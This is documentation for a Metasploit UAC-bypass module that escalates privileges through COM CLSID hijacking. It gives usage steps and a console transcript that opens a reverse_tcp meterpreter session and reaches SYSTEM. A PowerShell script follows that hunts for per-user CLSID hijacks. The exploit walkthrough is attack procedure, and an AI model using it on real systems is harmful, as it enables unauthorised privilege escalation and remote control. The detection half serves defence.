GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_comhijack.md

Introduction

This module bypasses UAC on Windows 7 through Windows 10 RS3 by hijacking a COM Class ID (CLSID) registered in the current user's registry hive. The hijacked key points to a DLL that carries the chosen payload. The module defines multiple COM vectors and picks one at random at runtime.

The module modifies the registry in order for this exploit to work. The modification is reverted once the exploitation attempt has finished.

This module requires that the payload architecture match the target operating system architecture, because the underlying system binaries that are invoked match the system architecture.

If a custom DLL is to be used with EXE::Custom, that DLL must match the system architecture, and should call ExitProcess() after starting the payload in a different process.

Usage

  1. Create a session on the target system under the context of a local administrative user.

  2. Begin interacting with the module: use exploit/windows/local/bypassuac_comhijack.

  3. Set the PAYLOAD and configure it correctly, making sure the architecture is correct.

  4. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true.

  5. Make sure that the SESSION value is set to the existing session identifier.

  6. Invoke the module: run.

Scenarios

```
msf exploit(bypassuac_comhijack) > sessions

Active sessions
===============

  Id  Type                     Information                          Connection
  --  ----                     -----------                          ----------
  1   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)

msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-5A73R51
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(bypassuac_comhijack) > options

Module options (exploit/windows/local/bypassuac_comhijack):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     xxx.xx.255.1     yes       The listen address
   LPORT     8443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(bypassuac_comhijack) > run

[*] [2017.08.16-12:58:31] UAC is Enabled, checking level...
[+] [2017.08.16-12:58:31] Part of Administrators group! Continuing...
[+] [2017.08.16-12:58:32] UAC is set to Default
[+] [2017.08.16-12:58:32] BypassUAC can bypass this setting, continuing...
[*] [2017.08.16-12:58:33] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] [2017.08.16-12:58:33] Uploading payload to C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll ...
[*] [2017.08.16-12:58:33] Executing high integrity process ...
[*] [2017.08.16-12:58:34] Sending stage (1188415 bytes) to xxx.xx.255.159
[*] Meterpreter session 2 opened (xxx.xx.255.1:8443 -> xxx.xx.255.159:51480) at 2017-08-16 12:58:35 +1000
[*] [2017.08.16-12:58:38] Cleaining up registry ...
[!] [2017.08.16-12:58:39] This exploit may require manual cleanup of 'C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll' on the target
msf exploit(bypassuac_comhijack) > sessions

Active sessions
===============

  Id  Type                     Information                          Connection
  --  ----                     -----------                          ----------
  1   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
  2   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51480 (xxx.xx.255.159)

msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 2...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
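The session above shows the two artifacts this technique leaves on the host: a CLSID key under HKCU\Software\Classes\CLSID that shadows a system component (Event Viewer's CLSID in this run) and a payload DLL dropped in the user's Temp directory. The following PowerShell hunt script is an added example written for this page, not part of the Metasploit module, to show what a defender would look for. It enumerates every per-user CLSID that carries an InprocServer32 or LocalServer32 registration, flags those that shadow an HKLM CLSID (per-user COM registrations take precedence over machine-wide ones, which is what the bypass relies on), and flags server paths that resolve into user-writable locations. The list of user-writable roots and the decision to treat any Temp-resident COM server as suspicious are assumptions of this example.

```powershell
# Hunt for per-user COM CLSID hijacks of the kind bypassuac_comhijack creates.
# Added example for this page; not code from the Metasploit module.
# Assumption: legitimate per-user COM servers do not live in temp/download dirs.

$suspiciousRoots = @(
    $env:TEMP,
    $env:LOCALAPPDATA,
    $env:APPDATA,
    "$env:USERPROFILE\Downloads",
    "$env:SystemDrive\Users\Public"
) | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\').ToLowerInvariant() }

function Get-ServerBinaryPath {
    param([string]$RegistryValue)
    # InprocServer32/LocalServer32 defaults may be quoted and carry arguments;
    # keep only the binary path so it can be tested against the roots above.
    $clean = ($RegistryValue -replace '^"([^"]+)".*$', '$1').Trim()
    return [Environment]::ExpandEnvironmentVariables($clean)
}

function Test-UserWritablePath {
    param([string]$Path)
    $lower = $Path.ToLowerInvariant()
    foreach ($root in $suspiciousRoots) {
        if ($lower.StartsWith($root)) { return $true }
    }
    return $false
}

function Get-HkcuComHijackCandidates {
    $clsidRoot = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path $clsidRoot)) { return @() }

    Get-ChildItem -Path $clsidRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $clsid = $_.PSChildName
        foreach ($serverKey in 'InprocServer32', 'LocalServer32') {
            $keyPath = Join-Path $_.PSPath $serverKey
            if (-not (Test-Path $keyPath)) { continue }

            $target = (Get-ItemProperty -Path $keyPath -ErrorAction SilentlyContinue).'(default)'
            if (-not $target) { continue }

            $binary = Get-ServerBinaryPath $target

            # A CLSID present in both hives is the shadowing pattern: the HKCU
            # copy is resolved first and overrides the system registration.
            $shadowsHklm = Test-Path "HKLM:\Software\Classes\CLSID\$clsid"

            [pscustomobject]@{
                CLSID        = $clsid
                ServerKey    = $serverKey
                Target       = $target
                ShadowsHklm  = $shadowsHklm
                UserWritable = Test-UserWritablePath $binary
                # A dangling reference means the DLL was already removed but
                # the key was left behind, which is also worth a look.
                TargetExists = Test-Path $binary
            }
        }
    }
}

# Anything that shadows an HKLM CLSID or points into a user-writable directory
# matches the pattern seen in the session transcript on this page.
Get-HkcuComHijackCandidates |
    Where-Object { $_.ShadowsHklm -or $_.UserWritable } |
    Sort-Object -Property ShadowsHklm, UserWritable -Descending |
    Format-Table -AutoSize
```

The module reverts its registry change once the elevated session is established, so a live registry sweep only catches the key during the few seconds between "Targeting" and "Cleaning up registry" in the transcript. Durable evidence is the dropped DLL the module warns may need manual cleanup, plus registry set/delete telemetry such as Sysmon event IDs 12 and 13 on HKCU\Software\Classes\CLSID, which record the key even after it is removed. Run the script in the context of the user whose hive is being inspected; HKCU: resolves to the current user's hive only.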